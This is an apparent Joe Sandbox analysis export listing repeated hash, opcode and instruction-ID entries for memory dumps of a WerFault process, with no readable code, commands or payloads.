                                                • Instruction ID: 0b6a43e748d1ca8dbe9fa7925e31c5404dbf5dc7b8b1acb70e9e5b98c02c0a90
                                                • Opcode Fuzzy Hash: 11bce277aeadbc8d94aa30e086433060878ffe0e93bf7cb5d4f1a6365a84ee62
                                                • Instruction Fuzzy Hash: C6314AB1C18A4E9EEB44EBA8D8157EDB7F2FF59741F0401BAD009E3296DE386944CB41
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ^N_H$r6B
                                                • API String ID: 0-2163777836
                                                • Opcode ID: 08d9cfa442e5b22de706fa82ae3f004a45024285e0644713b5f44de028c48559
                                                • Instruction ID: 091ac8a17e183f6125da63daa9f3ccce799349385adf9629d4f129ad31a341ac
                                                • Opcode Fuzzy Hash: 08d9cfa442e5b22de706fa82ae3f004a45024285e0644713b5f44de028c48559
                                                • Instruction Fuzzy Hash: 07219731E1491D8FDF84EFA8D499EADB7F1FF58341B404465D11DD72A6DA38A881CB40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $r6B
                                                • API String ID: 0-2315467569
                                                • Opcode ID: 2f29856645f88beb154239aa3103b07130a0d39b061508006040e3d6de879e71
                                                • Instruction ID: 92411a4b304f3dd571bcceb3273a58d6db9dab28c74bf6e3d684730ce97c65da
                                                • Opcode Fuzzy Hash: 2f29856645f88beb154239aa3103b07130a0d39b061508006040e3d6de879e71
                                                • Instruction Fuzzy Hash: 21213B32D9850BDAEB599A98D8586FCB7F2FF44381F64427AE00DD21C6CE282482DB41
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $r6B
                                                • API String ID: 0-2315467569
                                                • Opcode ID: 32ed7342e70efdacf64fc071342f5c8a0be92d7ca09692a40399ea1ac5a735a6
                                                • Instruction ID: 0b0181190372234e89dfd350336d92a1bc76175faec6dc946003e18a15d64013
                                                • Opcode Fuzzy Hash: 32ed7342e70efdacf64fc071342f5c8a0be92d7ca09692a40399ea1ac5a735a6
                                                • Instruction Fuzzy Hash: BC115871D985499FEB49DF98D894ABDBBB2FF58340F1441B9D02ED3282CA386902CB00
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: b4B
                                                • API String ID: 0-3849415641
                                                • Opcode ID: b456a334b9542ad2ec9516ae870f27972b1cef29d07d14e78dbfb601e1dc3e1b
                                                • Instruction ID: 8e6013b2a9490aff2913dc98599fafca1f9fa47c01efec5f7b3367609aaeecd8
                                                • Opcode Fuzzy Hash: b456a334b9542ad2ec9516ae870f27972b1cef29d07d14e78dbfb601e1dc3e1b
                                                • Instruction Fuzzy Hash: C0510731A9C69A4FF70D9A689C512BC77E2FB46358F6401BDD48FC7283D919A883C781
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: b4B
                                                • API String ID: 0-3849415641
                                                • Opcode ID: f1bdd1c668d02e8a44bd7c313bc36c13ef7629f40e69b24b8df764cfbca7007d
                                                • Instruction ID: d5e97b07a83382d8f42a7cbb0753620241e215b32e8757838a072de55228924f
                                                • Opcode Fuzzy Hash: f1bdd1c668d02e8a44bd7c313bc36c13ef7629f40e69b24b8df764cfbca7007d
                                                • Instruction Fuzzy Hash: 6A511631A9C6994FF70D9A6898512BC7BE2FB46358F2802FDC49FC7293D9196843C781
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0DL
                                                • API String ID: 0-3174716889
                                                • Opcode ID: 0f8a7e11a3bbc8574b7cc1af0e93059ed8ee378a0074054c4f10385b029ce6bf
                                                • Instruction ID: aa0325a6e74788d1c7d28299837d3eac9de5f768f77bd5fc981d5f98ee11e4d4
                                                • Opcode Fuzzy Hash: 0f8a7e11a3bbc8574b7cc1af0e93059ed8ee378a0074054c4f10385b029ce6bf
                                                • Instruction Fuzzy Hash: 4771C670D58A1D8FEB94EB68D894BACB7F2FF58341F5041A9D01DE7292DA34A981CF00
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0N_H
                                                • API String ID: 0-3998158670
                                                • Opcode ID: 49ccdac78354d4d1cdcfbc8d2034d47ebc2c212fdc945496cc56f8b5cc7a78f8
                                                • Instruction ID: 87662903f7b0f2b197926fa32d2b265a2e474cc015d84638fe5340aaac0eb396
                                                • Opcode Fuzzy Hash: 49ccdac78354d4d1cdcfbc8d2034d47ebc2c212fdc945496cc56f8b5cc7a78f8
                                                • Instruction Fuzzy Hash: E741383198CB474FE7259A68A4556BAB7F2FF45350B05067FD08EC3243DE2EA886C781
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B
                                                • API String ID: 0-2624010786
                                                • Opcode ID: e1cdd816583cdb7952d230c68e919d12aa7b2e24eeb9ed95346b1dc48c9b324b
                                                • Instruction ID: c150332c0d4d6667541df02b2fd1e687213d2fb45e679de9ce3795bb97fe6b0f
                                                • Opcode Fuzzy Hash: e1cdd816583cdb7952d230c68e919d12aa7b2e24eeb9ed95346b1dc48c9b324b
                                                • Instruction Fuzzy Hash: CA517030A58A464FE768DB29D09466AB2E2FF54344F504A7DD05FC3A96CA39F882CB40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: L
                                                • API String ID: 0-2896118805
                                                • Opcode ID: fd915e7ea1d573765ceff5962674a1b46924c0a8c010938f520c3c368441483b
                                                • Instruction ID: 20cf7df575aa5e6e17b74819c0e3f6e68c9ed5b6e5716080fb8a08fda49f371d
                                                • Opcode Fuzzy Hash: fd915e7ea1d573765ceff5962674a1b46924c0a8c010938f520c3c368441483b
                                                • Instruction Fuzzy Hash: 35418E32D4858A5FEB45ABA8F8166FDBBB2FF88750F0401B6E009D71D7CD282982C741
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: H;H
                                                • API String ID: 0-2930457148
                                                • Opcode ID: 2c9f8e2edd9ad8f34ea52eb2a379bdaadd96bd389e248990d145ba9b33894008
                                                • Instruction ID: ad2052952992e58292d515a256933c60513fb2898040116a243e9accb1777f99
                                                • Opcode Fuzzy Hash: 2c9f8e2edd9ad8f34ea52eb2a379bdaadd96bd389e248990d145ba9b33894008
                                                • Instruction Fuzzy Hash: 2541C870D08A5D9FDB94EFA8D499BADBBF1FF68701F14006AD009E7295DB74A881CB40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: N_I
                                                • API String ID: 0-1668815123
                                                • Opcode ID: 50dc2b2a7cbc8cda414cfb9852a3b5ebe29f65bccaa5403d05c3840375229c96
                                                • Instruction ID: 1b07d862f28b74549d43e35d7b91d9570a7ebae5f84fd0df6a27655a4c926746
                                                • Opcode Fuzzy Hash: 50dc2b2a7cbc8cda414cfb9852a3b5ebe29f65bccaa5403d05c3840375229c96
                                                • Instruction Fuzzy Hash: B231F432D4D5929BEB059A68A8A16FDBFF2FF123A4B4441B6D04C8B187DD186886C781
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B
                                                • API String ID: 0-2624010786
                                                • Opcode ID: ef7801ddaba555f35737734ca9ac0a83bc706a6f505d41f34db9adbbb89f92a3
                                                • Instruction ID: ba47b1f04a4681571715a484e3e778624f993f00543c1e9acbd810ecea100f4b
                                                • Opcode Fuzzy Hash: ef7801ddaba555f35737734ca9ac0a83bc706a6f505d41f34db9adbbb89f92a3
                                                • Instruction Fuzzy Hash: 5F21D771D5C94A8FE798E6A898562BDB7F2FF45360F1401BAD44EC31C2ED185C86C381
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8eL
                                                • API String ID: 0-2915619072
                                                • Opcode ID: 4fee63b798dcc08fb0381f815134496b404ca91777af9f3fa2de9909bada84a4
                                                • Instruction ID: 69cea87130916f2d7eb738df9d40f32faa6f522e25358506b321dcb3ebc4bdce
                                                • Opcode Fuzzy Hash: 4fee63b798dcc08fb0381f815134496b404ca91777af9f3fa2de9909bada84a4
                                                • Instruction Fuzzy Hash: B821AC31D18A1E8FEB54EF98E8006EEB7F5FB89354F00017AE41DE3285DB35A9548781
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B
                                                • API String ID: 0-2624010786
                                                • Opcode ID: cce2b602745c4588d1393e9b4ae0bc3147543866ed5a05b22bd9d99c67039d81
                                                • Instruction ID: 3d26029dc2c44f3fccdb4f3019293d0257ebee1c46e6d83fe0816eedf9c6cbeb
                                                • Opcode Fuzzy Hash: cce2b602745c4588d1393e9b4ae0bc3147543866ed5a05b22bd9d99c67039d81
                                                • Instruction Fuzzy Hash: 7A116332F6C91A4BEA58E55CE852ABCB3E3FF997A4B104276D01ED3282DD1468428781
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B
                                                • API String ID: 0-2624010786
                                                • Opcode ID: 8f4426d8fb1fac2d0f6d95d279c6aa86345c2b923b4232b2909f15adc1098c4c
                                                • Instruction ID: c678450f3692853c9b44fa19931c6d75e40d80d8ec7e27a95926da2028552d4c
                                                • Opcode Fuzzy Hash: 8f4426d8fb1fac2d0f6d95d279c6aa86345c2b923b4232b2909f15adc1098c4c
                                                • Instruction Fuzzy Hash: CD115E32FAC92A5BAA58A65CE8425FC73F3FB98BA0B540175D04ED3282DD146C428785
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: XE
                                                • API String ID: 0-1903603036
                                                • Opcode ID: a14eafb811baa3fa30d7bd4314e646a344ea33bfeea1054c27c96d352eb2a969
                                                • Instruction ID: 34e55f55aa252c8710dee1fbb9ef3887dcf0c499ec33b34eae9ba652b391006c
                                                • Opcode Fuzzy Hash: a14eafb811baa3fa30d7bd4314e646a344ea33bfeea1054c27c96d352eb2a969
                                                • Instruction Fuzzy Hash: 8311E036C8828A4FEB42ABA4A8492EDBFF0FF47364F0401B7D008D70D2DA285586C752
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B
                                                • API String ID: 0-2624010786
                                                • Opcode ID: cae9c0fa3e5676bf1175d723e9cebd9e49699a7994220195f1504f61a09ba7a9
                                                • Instruction ID: 6284bd687349293b10f147ec85d1f3030ffe2c4b318f89380682adf52b97abe9
                                                • Opcode Fuzzy Hash: cae9c0fa3e5676bf1175d723e9cebd9e49699a7994220195f1504f61a09ba7a9
                                                • Instruction Fuzzy Hash: 6A012862F1CD8A4FE788EE6C90447B9B3E1FF68345B0082BAC00EC3587EE24A8458340
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0edb775aec4d1811e2168381dd5750d2ce80e9484db383c0452ce80c853fa7a7
                                                • Instruction ID: c8d19f00029b494a6ac7e460824a59542a2e86b99704c4d286ad5b49164afbf1
                                                • Opcode Fuzzy Hash: 0edb775aec4d1811e2168381dd5750d2ce80e9484db383c0452ce80c853fa7a7
                                                • Instruction Fuzzy Hash: 62D11671D1869A8FEB98DB68D8647ADB7F2FF58340F1441B9D00DE7292CE386984CB41
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bc30171668b348e28e6c748587aa94c181ae1cb36118a6a943bcd0281e69bc44
                                                • Instruction ID: e6d6841ae724765c6b1950acae88f08263f88880ef35915cbc056548b5ccc6cd
                                                • Opcode Fuzzy Hash: bc30171668b348e28e6c748587aa94c181ae1cb36118a6a943bcd0281e69bc44
                                                • Instruction Fuzzy Hash: 74B12871D18A9A8FEB98EB68C8647ADB6F2FF54340F1441BDD00DD7692CE386984CB41
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8340983381d1e8f74971a6da1ae7dc89a2f23a2f2195a723ba321104728d32c8
                                                • Instruction ID: 0f669fded4a7d1488ce0a5a6c790e7830578e720e53534f82504c94a76fb7878
                                                • Opcode Fuzzy Hash: 8340983381d1e8f74971a6da1ae7dc89a2f23a2f2195a723ba321104728d32c8
                                                • Instruction Fuzzy Hash: DF81E231C8C94F8FEB65DBA898012FC7BF5FF56350F05027AD45AD3182EA28685AC791
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3821d232124faebe3a280369cc6a7cf08e58fdf41d7856b34a6f75522be9eab1
                                                • Instruction ID: d58423aed39c22bfdd8d1c7276694bdf20023fa4234a08d01647281cd30c3035
                                                • Opcode Fuzzy Hash: 3821d232124faebe3a280369cc6a7cf08e58fdf41d7856b34a6f75522be9eab1
                                                • Instruction Fuzzy Hash: 80A17130A98B068FE368CB28D4945A977F2FF54350B54497DC48EC7A96DB39F882CB41
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 097e42b9094dfd08946dda984bdc48e5efa5f89095d86e8927279179fbcc95d4
                                                • Instruction ID: 26567b7f0a3b62572a48eb47c3ff3c8a16baf6a8b37b5a8ce731f907e99df2a2
                                                • Opcode Fuzzy Hash: 097e42b9094dfd08946dda984bdc48e5efa5f89095d86e8927279179fbcc95d4
                                                • Instruction Fuzzy Hash: CFA1C530A58B068FE369CB28D4955BA77F2FF44344B64497DC08AC7696DB39F882CB41
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 10388a9bc0b4b2737f53249c42900a702b27d93ecfcaec97fad2d62cf5fdc23e
                                                • Instruction ID: 4283d51a6c710b2234702b2ef0a5cbb6eda4bdfba6e33e33b9d6da01e0bf3b89
                                                • Opcode Fuzzy Hash: 10388a9bc0b4b2737f53249c42900a702b27d93ecfcaec97fad2d62cf5fdc23e
                                                • Instruction Fuzzy Hash: 9A8173319586499FDB41EBA8D895BED7BF1FF49350F1402B6E018D32C3CA386985CB92
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 72e106c29f759214e1eed53babc5a835c6d5d4b6f9ec484efed44212ea79dd08
                                                • Instruction ID: 6d5219f52667b344d067eff122727bb4d6fcde337772de7de60fc903f97c61c5
                                                • Opcode Fuzzy Hash: 72e106c29f759214e1eed53babc5a835c6d5d4b6f9ec484efed44212ea79dd08
                                                • Instruction Fuzzy Hash: B4910270D1864A8FDB58DFA4C490AEEB7B2FF59341F60017DE00DA7292CA39A981CF51
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7c5191730701cde2d7c662eaf5addb472896e9f7d2e53eec4bf60e89360f407b
                                                • Instruction ID: 1e390de02a6be6dcfbe9f449e9641c32bec5990fcaef2ed776866652ffaf1f3b
                                                • Opcode Fuzzy Hash: 7c5191730701cde2d7c662eaf5addb472896e9f7d2e53eec4bf60e89360f407b
                                                • Instruction Fuzzy Hash: 09615F31A586498FDB41EB98D491BEDBBF1FF58350F140679E018D32C7CA38A881CB92
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 25c8bc5ff9f23b4bba3803ec51bb37965b31d5acdd0094f39aca292f9798449d
                                                • Instruction ID: 9fb990be9dd927a058f196bb41fb96a372690a01b846bd71e1a5caccb31b174b
                                                • Opcode Fuzzy Hash: 25c8bc5ff9f23b4bba3803ec51bb37965b31d5acdd0094f39aca292f9798449d
                                                • Instruction Fuzzy Hash: 73518B3194CA874FE3359B28A455279BBF2FF55394B0401BEC08EC7183DE2DA886C752
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e5cd2b19d4e7f27300cb8cfd29b0024258ac82c552fa5c24ac5f1b12797a6199
                                                • Instruction ID: f4441279a729e2f9f84b78f16d62dc63abfe7d5a25d98f5d5a7223218ef5f8a8
                                                • Opcode Fuzzy Hash: e5cd2b19d4e7f27300cb8cfd29b0024258ac82c552fa5c24ac5f1b12797a6199
                                                • Instruction Fuzzy Hash: 9651D532C8D2DA4FD7126B60AC515EA7FB4FF02350F0902B7D458C7092DA2DA696C362
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9087a3b1a4fe2d9e4d74d90e107a1018506d30be612af09001a5eea0d85dced5
                                                • Instruction ID: f7c7eb57fa04eebb406d5506ca78b945254a205bac2db217bdaf1f3e919676f9
                                                • Opcode Fuzzy Hash: 9087a3b1a4fe2d9e4d74d90e107a1018506d30be612af09001a5eea0d85dced5
                                                • Instruction Fuzzy Hash: F9518B31848A0D8FCB44EFA8D8546EDBBF1FF4A310F40067AE008D7292DB39A595CB91
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f262475ee28b1318b43eafbe8e451aa6dc15d0f926dd706bf5acfb7277abea3
                                                • Instruction ID: 536ddbfd40ec4a2a9179a3d8e3cdf5f2ec33fa84744e7bf56403662d9035d91e
                                                • Opcode Fuzzy Hash: 5f262475ee28b1318b43eafbe8e451aa6dc15d0f926dd706bf5acfb7277abea3
                                                • Instruction Fuzzy Hash: F361EA70D1465D8FEB84EBA8D899BECBBB1FF58340F10416AD00DE7292DB386985CB41
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9c4456ec5e8772f2218536a8a23e5d6a39b293f6d308ffbbbf0da34d4f0e8ca0
                                                • Instruction ID: f2753d315c14be66815416af5665575ede9bad46d95c3fbde3b3baa1254c31ef
                                                • Opcode Fuzzy Hash: 9c4456ec5e8772f2218536a8a23e5d6a39b293f6d308ffbbbf0da34d4f0e8ca0
                                                • Instruction Fuzzy Hash: 48415930D4855D9FDB44EFA8D844AEDBBF1FF5A310F01017AE009E7291CA39A991CB91
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 216c71bd340fdc53de016d69c2e3cb054f2c1a7786bd86efbed124ee827878f0
                                                • Instruction ID: 059b7e76d72b366705e052b6ad72c6255a1c479640929007fd77b6441fd9cced
                                                • Opcode Fuzzy Hash: 216c71bd340fdc53de016d69c2e3cb054f2c1a7786bd86efbed124ee827878f0
                                                • Instruction Fuzzy Hash: C8412971A5CA534FE31DCA2C94554BEB7F2FF94354B1446BED08BC328AED18A486C741
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 29f82ad4a02a298167be3908337f01474ee6831d795140b2cc40633e2e5af681
                                                • Instruction ID: 9e9e4a96d54446c1802589a37985db753daa5ecf627fff53f3c9684a8dbf6886
                                                • Opcode Fuzzy Hash: 29f82ad4a02a298167be3908337f01474ee6831d795140b2cc40633e2e5af681
                                                • Instruction Fuzzy Hash: D3419C31D4890E9BDB64EF18E8806FDB3B9FB59390F00117AE01DE7281DB35AA85CB55
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5775b48f2803463c4b988498af5e807038edb1f76c5ce7414a5266c711095c1d
                                                • Instruction ID: 91b71987c8b8d0d295b2d2f411a45cb65fe938fcf484e8016e5b52de975a4763
                                                • Opcode Fuzzy Hash: 5775b48f2803463c4b988498af5e807038edb1f76c5ce7414a5266c711095c1d
                                                • Instruction Fuzzy Hash: BF41B43188E3D64FD71757706C665EA3FB4AF03210B0A02E7E498CB493D51DA596C363
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a466e744906314f643916410e0ab6c1460c824a29d2655d6ce65252c1f2f1af1
                                                • Instruction ID: cb4ef2fbba3be378b9c8ec9ae258b0cdc583e1c6a147f92fd71d707c6052250c
                                                • Opcode Fuzzy Hash: a466e744906314f643916410e0ab6c1460c824a29d2655d6ce65252c1f2f1af1
                                                • Instruction Fuzzy Hash: 2541BC31C4850E9BDB64EF08E8806FDB7B9FB5A390F00127AD01DE7281DB35AA85CB55
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a0cf3bff4aae96dd0307a56af61d4da59970dcac53713a2a3da4e7e7c2b2e572
                                                • Instruction ID: 54b4edfa64cd6fede086700bb21b9571226d945b7a4b49bce98997f11370889b
                                                • Opcode Fuzzy Hash: a0cf3bff4aae96dd0307a56af61d4da59970dcac53713a2a3da4e7e7c2b2e572
